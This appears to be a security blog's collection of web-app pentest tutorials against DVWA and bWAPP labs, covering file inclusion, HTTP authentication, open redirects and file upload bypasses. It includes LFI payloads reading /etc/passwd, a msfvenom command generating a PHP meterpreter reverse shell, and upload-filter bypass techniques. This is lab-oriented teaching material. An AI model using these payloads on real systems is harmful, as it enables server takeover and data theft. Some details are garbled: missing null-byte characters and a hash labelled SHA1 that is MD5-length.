Information Security: wapt

Showing posts with label wapt. Show all posts

LOCAL & REMOTE FILE INCLUSION

Developer can insert the content of PHP file into another PHP file before the server executes it, with the include() function. The function can be used to create functions, headers, footers or element that will be reused on multiple pages.

This will help developers to make it easy to change the layout of complete website with minimal effort. If there is any change required then instead of changing thousands of files just change included file.

The require() statement is also used to included a file into the PHP code. However, there is a big difference between include and require, when a file is included with the include statement and PHP cannot find it, the script will continue to execute.

But in require statement, script will not continue if the file is not available. It will return fatal error.

Require_once() function can access the data of another page once when you may need to include the called file. The only difference between require and require_once is, if the file found that it has already been included, calling script is going to ignore further inclusions.

Note: allow_url_include is disabled by default. If allow_url_fopen is disabled, allow_url_include is also disabled.

File Inclusion Attacks:

It allows an attacker to include a file on the wen server through a php script. This vulnerability arises when a web application accepts client to submit input into files or upload files to the server.

Two types of File Inclusion Attack,

a) Local File Inclusion

b) Remote File Inclusion

Basic Local File Inclusion:

LFI Vulnerability allows the user to include a file through URL in the browser.

In this article I have used two different platforms bWAPP and DVWA which contains file inclusion vulnerability.

Below is the file which we are going to attack,

{Please look image 01}

Before we select the “English” language, the url is http://192.168.93.156/bwapp/bWAPP/rlfi.php

After selecting the language, the url is http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=lang_en.php&action=go

We can see the change, the selected language file got included in the URL. I will change the path to different file to check it is vulnerable.

When I change the file path to below,

http://192.168.93.156/bwapp/bWAPP/rlfi.php?language=../../index.html

{Please look image 02}

{Please look image 03}

Null Byte:

By changing the level of security, the same file is not working.

{Please look image 04}

With the help of Burpsuite – Interceptor, we captured the requested data and the same has been forwarded to Burpsuite – Repeator.

{Please look image 05}

By adding a “null character” at end of the file it worked as expected.

Base64 Encoded:

There are another way to exploit LFI if the security level is high. Below is the url to use the PHP function,

http://192.168.1.101/bWAPP/rlfi.php?language= php://filter/read=convert.base64-encode/resource=/etc/passwd

{Please look image 06}

below is the base64 encoded value of //etc/passwd,

Decoded the above value with the help of Burpsuite – Decoder,

We can use the hackbar which is a Firefox plugin to decode the above base64 value,

{Please look image 07}

PHP Input:

Using PHP input function we will execute injected PHP code to exploit LFI vulnerability. Will perform this task with the help of “hackbar”.

{Please look image 08}

Manipulate the value inside the hackbar tool.

{Please look image 09}

{Please look image 10}

Proc/Self/Environ:

If the server is outdated from patching, it may be vulnerable to exploit through LFI.

proc/self/environ is a file that stores user_agent details. We will use this file to store our php code for executing CMD commands.

{Please look image 11}

Remote File Inclusion:

Remote file inclusion occurs when the URL of a file located on a different server is passed to as a parameter to the PHP function which is “include”, “include_once”, “require”, “require_once”. PHP incorporates the content into the pages. If the content happens to be PHP source code, PHP executes the file.

{Please look image 12}

{Please look image 13}

INFORMATION GATHERING (WEB)

FIREFOX ADDONS

ENCODING METHODS

WEB SHELLS

HTTP AUTHENTICATION

HTTP Protocol:
HTTP(Hyper Text Transfer Protocol) is basically a client-server protocol, where the client makes a request to the server and in return the server responses to the request. The response by the server is mostly in the form of HTML formatted pages. HTTP protocol by default uses port 80, but the web server and the client can be configured to use a different port for the communication.

HTTP is a stateless protocol which means the server does not retain the information by each user. HTTP is a backbone of the World Wide Web(www) and for it being stateless simply means that it does not remember each and every client that connects to the internet and it does not matter if a single user sends multiple requests one after the another, they all will still be treated as independent request by the server.

The predecessors of HTTP 2 are HTTP 1.0 and 1.1, and the differences are

HTTP 2 is binary and not textual
HTTP 2 is multiplexed, it can use a single connection for parallelism, HTTP 1 on the other hand is based on ordering and blocking
HTTP 2 uses compression in its headers to reduce the overhead
HTTP 2 gives servers the capability to “push” responses to client servers proactively

HTTP works through different methods and these methods are,
GET – Used to retrieve information from the given URL
POST – Used to send data to the server. For eg., Customer information, file upload etc. using HTML forms
DELETE – Delete a File of the specified URL
PUT – Uploads a File of the specified URL
TRACE – Trace on the jsp resource returns the content of the resource
HEAD – GET only HTTP headers and no document body
OPTIONS – HTTP methods that the server supports

The major difference between GET and POST are,

A HTTP client sends a request to the server in the form of request messages which includes following format,

REQUEST:
Method: GET
Host: This field in the header, it is used to identify individual website by a hostname is they are sharing the same IP address.
User-Agent: The client web browser also sets a user-agent string to identify the type and version of the browser. This field is set with default values by the web browser, but it can be spoofed by the end user.
Cookie: This field stores a temporary value shared between the client and server for session management.
Referer: This field is known to be redirection from one URL to another. It contains address of the previous web page from which a link to the current page was followed.
Accept-Encoding: This field defines the compression scheme supported by the client, gzip and deflate are the most common ones.

RESPONSE:
HTTP Version: It will return the server supporting HTTP version
Date: The data and time that the message was originated
Set-Cookie: This field, if defined, it will contain a random value that can be used by the server to identify the client and store temporary data.
Server: It displays the information about the web server hosting the website
Content-Length: This field contains a value indicating the number of bytes in the body of the response.

HTTP Authentication – Basic and Digest:
HTTP authentication uses methodologies via which web servers and browsers securely exchanges the credentials like user names and passwords. HTTP authentication or we can also call it as Digest authentication follows the predefined methods/standards which use encoding techniques and MD5 cryptography hashing over HTTP protocol.

Basic Access Authentication using Base64 Encoding:
In basic authentication we will be using base64 encoding for generating our cryptography string which contains the information of username and password. Note that we can use any of the encoding techniques like URL, Hexadecimal or any other we want.

The web page is asking for input from the client,
We have provided “hackingarticles” as username and “ignite” is a password.

The syntax of basic authentication is,
Value = username:password
Encoded Value = base64(Value)
Authorization Value = Basic <Encoded Value>

here, the encoded value of hackingarticles:ignite is, aGFja2luZ2FydGljbGVzOmlnbml0ZQ==

with the help of Burpsuite – Proxy, we can capture the request which has Authorization value as same.

Digest Access Authentication: RFC 2069

Digest Access Authentication uses the hashing methodologies to generate the cryptography result.

The syntax of RFC 2069 is,
Hash1=MD5(username:realm:password)
Hash2=MD5(method:digestURI)
Response=MD5(Hash1:nonce:Hash2)

Hash1 → It contains the MD5 hash value of (username:realm:password) where realm is any string provided by server and username and password are the input provided by client.

Hash2 → It contains the MD5 hash value of (method:digestURI) where method could be GET or POST depending on the page request and digestURI is the URL of the page where the request is being sent.

Response → It is a final string which is being sent to the server and contains the MD5 hash value of (hash1:nonce:hash2) where hash1 and hash2 are generated above and nonce is an arbitrary string that could be used only one time provided by the server to the client.

RFC 2617 is an enchanced version of RFC2069.

Digest Access Authentication: RFC 2617
RFC 2617 digest authentication also uses MD5 hashing algorithm but the final hash value is generated with some additional parameters.

The syntax of RFC 2617 is,
Hash1=MD5(username:realm:password)
Hash2=MD5(method:digestURI)
Response=MD5(Hash1:nonce:nonceCount:cnonce:qop:Hash2)

Hash1 → It contains the MD5 hash value of (username:realm:password) where realm is any string provided by the server and the username and password are the input provided by the user from client side.

Hash2 → It contains the MD5 hash value of (method:digestURI) where method could be GET or POST depending on the page request and digestURI is the URL of the page where the request is being forwarded.

Response → It is a final string which is being sent to the server and contains the MD5 hash value of (Hash1:nonce:nonceCount:cnonce:qop:Hash2) where Hash1 and Hash2 are generated from above steps.

URL REDIRECTION

01 Basic(Clear Text)
02 Encoding(Normal/Hex/Multilevel)
03 Base64
04 Hashing
05 Salt

A redirect automatically sends website’s visitors to some different location or URL. Redirection could be either at different location within the same site or a new site.

Unsecure redirection and forwarding are the outcomes when a web application accepts untrusted inputs that could cause web application to redirect the request to a URL contained within untrusted/unvalidated input. We can also call this type of redirection as Unvalidated Redirection.

** Basic Redirection:

The below image shows the redirection link(Highlighted) which is a clear text (192.168.93.156/redirect/01-redirect/re.php?url=http://www.hackingarticles.in)

This page is redirecting to http://www.hackingarticles.in

This is a basic and simple redirection, from one page to another through php scripts without considering any security measures in account.

** URL Encoding:

The below image shows the redirection link(Highlighted) which is a clear text (192.168.93.156/redirect/02-hex/re.php?url=http://www.hackingarticles.in)

Here, We are not changing the page of redirection site instead, we are going to use simple URL encoding. We can send our URL in URL Encoded format and the encoded URL is being decoded through the script running on our redirected php page(re.php in this case)

We can use any online/offline tool to convert for calculating URL encoded value.
This case we using http://www.meyerweb.com and Burpsuite – Decoder.

Below is the value of URL encoder of http://www.hackingarticles.in

192.168.93.156/redirect/02-hex/re.php?url=http://www.hackingarticles.in

We will land in the same page if we use URL encoding,
192.168.93.156/redirect/02-hex/re.php?url=http%3A%2F%2Fwww.hackingarticles.in

** HEX Encoding:

Here we are converting the redirection URL into Hexadecimal Value using Burpsuite – Decoder.

Single Hex encoded value of http://www.hackingarticles.in is,
%68%74%74%70%3a%2f%2f%77%77%77%2e%68%61%63%6b%69%6e%67%61%72%74%69%63%6c%65%73%2e%69%6e

** Multilevel Encoding:

Multilevel encoding where we are re-encoding the pre-encoded value.

The Double encoded value of http://www.hackingarticles.in are
%25%36%38%25%37%34%25%37%34%25%37%30%25%33%61%25%32%66%25%32%66%25%37%37%25%37%37%25%37%37%25%32%65%25%36%38%25%36%31%25%36%33%25%36%62%25%36%39%25%36%65%25%36%37%25%36%31%25%37%32%25%37%34%25%36%39%25%36%33%25%36%63%25%36%35%25%37%33%25%32%65%25%36%39%25%36%65

Which is also landing in the same page.

** Base 64 Encoded Redirection:

Below image shows the redirection link which is a Base 64 encoded.
http://192.168.93.156/redirect/03-base64/re.php?url=aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4%3D

If we wanted to redirect to different site, for example http://google.com

Changing the redirection link from base64 of http://hackingarticles to http://goolge.com is below,

http://192.168.93.156/redirect/03-base64/re.php?url=aHR0cDovL3d3dy5oYWNraW5nYXJ0aWNsZXMuaW4%3D

to

http://192.168.93.156/redirect/03-base64/re.php?
url=aHR0cDovL2dvb2dsZS5jb20=

The above page is landing to http://google.com as expected.

** Redirection using Hash Values:

In this article, We will cover the more secured way of redirection using hashing techniques.

Below is the image shows the link of redirection and the site

http://192.168.93.156/redirect/04-hashing/re.php?url=http://www.hackingarticles.in&hash=8258c1efb05943d059476150cb22df1d

We can see that the redirection link not only contains the redirection URL as a parameter but also generating the hash value using MD5/SH1/SHA512 or any of the hashing algorithm. The redirection will only work if the combination of URL and its hash value is correct else it will not work.

For understanding, our redirection link showing the parameters like URL and Hash value but in real development, developers will hide those details. So that attacker will not be able to judge where the page is being redirected.

For this exercise, We will make use of hash calculator(HashCalc) tool.

MD5 hash value of http://www.hackingarticles.in is 8258c1efb05943d059476150cb22df1d

For testing, We will change the hash value from 8258c1efb05943d059476150cb22df1d to 9258c1efb05943d059476150cb22df1d

Above screenshot clearly shows that, URL and hash value is not matching and hence the redirection is not working.

** Redirection using Hash Values with Salting:

To increase the security of redirection URL, introducing about salting. Salt is a parameter which is added to be more secure with URL redirecton. Salt value could be a combination of characters, digits, alphanumeric, special character or anything we can define.

Salt value may be added in the front or end of the URL and this is based on developer interest.

Here in our example, below is the redirection URL with salting and hashing.
http://192.168.93.156/redirect/05-salt/re.php?url=http://www.hackingarticles.in&salt=black&hash=1c175b02baf8cf857523fdfe6c2d7645

When we click on redirect link redirection script on re.php will catch the passed URL and generate its hash value(We are using SHA1 hash algorithm) by appending the salt value(Black) in front of the URL and compare the generated hash value we have sent with the request. Link will take us to redirection page only both the value matches.

SHA1 hash value of http://www.hackingarticles.in{black} is 1c175b02baf8cf857523fdfe6c2d7645

If the value didn’t match, below is the output we get,

FILE UPLOAD

File upload vulnerability is a major problem with web based applications. In many web servers this vulnerability depends entirely on purpose, that allows an attacker to upload a file with malicious code in it that can be executed on the server.

Basic file upload:
A Simple php file will get uploaded on the web server without any restrictions, here server does not check the content- type or file extensions.

Set DVWA Security as Low in level

   {Please look image 01}

Create a php backdoor through following command,
root@kali:~# msfvenom -p php/meterpreter/reverse_tcp lhost=172.20.10.3 lport=4444 -f raw

   {Please look image 02}

Save the output with PHP extension as img.php

   {Please look image 03}

   {Please look image 04}

We have successful uploaded a malicious php file and it gave us the directory to where the file is stored.

Before executing the malicious php file which we uploaded, We need make listen on attacker machine with metasploit,


   {Please look image 05}

Malicious file is been uploaded to 192.168.93.156/dvwa/hackable/uploads/

   {Please look image 06}

I got a meterpreter session when I chose a img.php file, which it gave a reverse connection to an attacker

   {Please look image 07}

Double Extension Injection Technique:

For this exercise, We need to change the security level to medium.

   {Please look image 08}

This time it didn’t allowed me to upload malicious php file and it says it will only accept JPEG or PNG images.

   {Please look image 09}

To bypass this restrictions, We are going to hide the real nature of a file by inserting multiple extension with filename which creates confusion to security parameters.

Change the name of existing malicious file which is img.php to img.php.png

Setting listener with metasploit,

   {Please look image 10}

Now, We are uploading a double extension file which is img.php.png

   {Please look image 11}

Before uploading, We need to capture the packets with Burpsuite – Interceptor, which will help to change a file extension or to bypass client side security parameter.

Burpsuite – Interceptor captures the fileupload request, We need to change the file extension before uploading to server,

   {Please look image 12}

   {Please look image 13}

   {Please look image 14}

   {Please look image 15}

File is been successfully uploaded with the extension php.
We have got a reverse connection when we chose the uploaded malicious file.

Null Byte Injection:
Null byte injection is an exploitation technique which uses URL-encoded null byte characters(i.e. , or 0x00 in hex) to the user-supplied data. A null byte in the URL is represented by ‘’ which in ASCII is a “”(blank space).
This injection process can alter the intended logic of the application and allows malicious adversary to get unauthorized access.

The reason behind inserting a null byte value is, some of the application servers scripting language still using c/c++ libraries to check the filename and content. In c/c++ a line ends with /00 is call null byte.

Hence when the compiler studies a null byte at the end of the string, it will assume that it has arrived at the end of the string and stop further reading of string.

Repeat the same process for creating a backdoor and msfconsole for listener. I have the double extension file which is img3.php.jpg.

We have captured the request with the help of Burpsuite – Interceptor,

16

Added a string to make a null byte at the end of malicious file extension,

17

Image of Hex value,

18

Changing into null byte,

19

Review the RAW data again and there is no string instead a blank space available,

20

21

22

Malicious file is been uploaded successfully.
Started the listener, We have got a reverse connection when we chose the uploaded malicious file,

23

Blacklisting File Extension:

This exercise, We will use bwapp application with medium level security.

24

25

When I tried uploading a malicious file which is img3.php, the extension of php is in blacklisting. To bypass this case sensitive rule or restriction, We use the alternative form of the same file which will PhP, php3.

Filename: img3.php3

The file has been uploaded successfully.

26

27

28

Started reverse TCP handler, We have got a reverse connection when we chose the uploaded malicious file.